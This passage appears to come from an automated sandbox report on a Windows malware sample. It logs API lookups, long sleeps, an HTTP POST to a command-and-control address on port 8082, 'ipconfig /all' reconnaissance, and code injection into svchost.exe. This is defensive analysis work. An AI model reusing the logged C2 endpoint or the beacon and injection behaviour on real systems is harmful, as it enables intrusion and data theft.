| Get Address | c:\windows\system32\kernel32.dll | function = lstrcatA, address_out = 0x76b5a19f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcpyA, address_out = 0x76b59793 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateThread, address_out = 0x76b622a7 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76b58fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Process32NextW, address_out = 0x76b4faca |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleOutputCP, address_out = 0x76bbe210 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x76b12082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapCreate, address_out = 0x76b63ea2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x76b5cf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x76b6395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x76b633d3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapFree, address_out = 0x76b5bbd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenW, address_out = 0x76b5d9e8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcpynW, address_out = 0x76b76118 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x76b6452b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapAlloc, address_out = 0x77382dd6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessHeap, address_out = 0x76b61280 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenA, address_out = 0x76b5a611 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapReAlloc, address_out = 0x7739ff51 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x76b596fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetHandleInformation, address_out = 0x76b48856 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnterCriticalSection, address_out = 0x773777a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77377760 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreatePipe, address_out = 0x76b735b7 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSection, address_out = 0x7738a149 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = PeekNamedPipe, address_out = 0x76b9f74b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x76b5ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryAndExitThread, address_out = 0x76b4fdb8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x76b5bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ExitThread, address_out = 0x7735f611 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateToolhelp32Snapshot, address_out = 0x76b4f731 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Sleep, address_out = 0x76b5ba46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WideCharToMultiByte, address_out = 0x76b6450e |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x76c2426d |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wvsprintfA, address_out = 0x76c13c94 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = IIDFromString, address_out = 0x76ce2ff2 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoSetProxyBlanket, address_out = 0x76ce5ea5 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x76d19d0b |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoUninitialize, address_out = 0x76d186d3 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitializeEx, address_out = 0x76d109ad |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 9, address_out = 0x76a63eae |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 185, address_out = 0x76a807cd |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 94, address_out = 0x76a86ba7 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 6, address_out = 0x76a63e59 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 20, address_out = 0x76a7e173 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 25, address_out = 0x76a7ea56 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 19, address_out = 0x76a7e127 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 8, address_out = 0x76a63ed5 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _wtoi, address_out = 0x76f8c823 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf_s, address_out = 0x76f9141b |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _vsnwprintf_s, address_out = 0x76f913b4 |
|
1 |
System (52)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 10000 milliseconds (10.000 seconds) |
|
46 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
6 |
Network Behavior
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 0 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 186.159.1.217 |
TCP Session #1
| Information | Value |
|---|---|
| Remote Address | 186.159.1.217 |
| Remote Port | 8082 |
| Local Address | 192.168.0.251 |
| Local Port | 49209 |
| Data Sent | 0 bytes |
| Data Received | 0 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = test, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 186.159.1.217, server_port = 8082 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/90, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = Content-Type: multipart/form-data; boundary=Arasfjasu7, url = 186.159.1.217/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/90 |
|
1 | |
| Read Response | size = 127, size_out = 3 |
|
1 | |
| Read Response | size = 127, size_out = 0 |
|
1 | |
| Close Session | - |
|
1 |
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 378 bytes |
| Total Data Received | 148 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 186.159.1.217 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | test |
| Server Name | 186.159.1.217 |
| Server Port | 8082 |
| Username | - |
| Password | - |
| Data Sent | 378 bytes |
| Data Received | 148 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = test, access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 186.159.1.217, server_port = 8082 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/90, accept_types = 0 |
|
1 | |
| Send HTTP Request | headers = Content-Type: multipart/form-data; boundary=Arasfjasu7, url = 186.159.1.217/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/90 |
|
1 | |
| Read Response | size = 127, size_out = 3 |
|
1 | |
| Read Response | size = 127, size_out = 0 |
|
1 | |
| Close Session | - |
|
1 |
Process #43: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #43 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | /c ipconfig /all |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:03:38, Reason: Child Process |
| Unmonitor | End Time: 00:03:39, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3ec |
| Parent PID | 0xa70 (c:\windows\system32\svchost.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
208
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 136, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\ipconfig.exe | os_pid = 0xcf4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a590000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76b624c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76b4ac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76b53ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76b62732 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:33:44 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11062982 |
|
1 | |
| Get Time | type = Performance Ctr, time = 29218372871 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #44: ipconfig.exe
109
0
| Information | Value |
|---|---|
| ID | #44 |
| File Name | c:\windows\system32\ipconfig.exe |
| Command Line | ipconfig /all |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:03:38, Reason: Child Process |
| Unmonitor | End Time: 00:03:39, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcf4 |
| Parent PID | 0x3ec (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
CF0
0x
CC0
0x
CBC
0x
D14
0x
D28
0x
D24
|
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | EB082BA1-DF8A-46BE-82F3-35BF9E9BE52F | 432A1DA5-3888-4B9A-A734-CFF1E448C5B9 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER |
|
1 |
File (91)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
30 | |
| Open | STD_OUTPUT_HANDLE | - |
|
31 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 47 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 43 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 45 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 81 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 66 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 52 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 50 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 48 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 67 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 65 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 64 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{D303B40D-CBB0-4CD4-933A-0697F06EA7C1} | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D303B40D-CBB0-4CD4-933A-0697F06EA7C1} | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{D303B40D-CBB0-4CD4-933A-0697F06EA7C1} | value_name = Dhcpv6ClassId, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D303B40D-CBB0-4CD4-933A-0697F06EA7C1} | value_name = DhcpClassId, data = 1, type = REG_NONE |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\ipconfig.exe | base_address = 0xa30000 |
|
1 |
Service (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | service_name = NapAgent |
|
1 | |
| Open | database_name = ServicesActive |
|
1 | |
| Open Manager | database_name = ServicesActive |
|
1 |
System (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = ZgW5tdPu, type = ComputerNameDnsHostname |
|
1 | |
| Get Computer Name | type = ComputerNameDnsDomain |
|
1 | |
| Get Time | type = System Time, time = 2019-05-14 15:33:44 (UTC) |
|
3 | |
| Get Time | type = Ticks, time = 11063107 |
|
1 | |
| Get Time | type = Performance Ctr, time = 29239068005 |
|
1 | |
| Get Network Adapter Info | - |
|
1 | |
| Get Network Adapter Info | - |
|
1 |
Process #45: svchost.exe
140
1
| Information | Value |
|---|---|
| ID | #45 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | svchost.exe |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:03:45, Reason: Child Process |
| Unmonitor | End Time: 00:04:16, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:31 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb28 |
| Parent PID | 0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B38
0x
B58
0x
B68
0x
B7C
0x
B80
0x
BFC
0x
C04
0x
A04
0x
D40
|
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x50000, size = 367 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x60000, size = 112 |
|
50 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x602104, size = 12 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10000000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10001000, size = 11264 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004000, size = 4608 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10006000, size = 1036 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10006000, size = 512 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10007000, size = 1024 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 22 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 12 |
|
7 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 16 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040a0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 26 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004000, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 24 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 17 |
|
5 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 16 |
|
36 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004084, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004088, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000408c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004090, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 14 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004094, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 20 |
|
6 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004098, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 6 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004008, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 21 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000400c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 19 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004010, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004014, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004018, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 13 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000401c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 12 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004020, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 9 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004024, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 11 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004028, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000402c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004030, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 15 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004034, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004038, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000403c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 10 |
|
3 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004040, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004044, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004048, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000404c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004050, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004054, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004058, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000405c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004060, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004064, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 25 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004068, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000406c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000407c, size = 4 |
|
1 | |
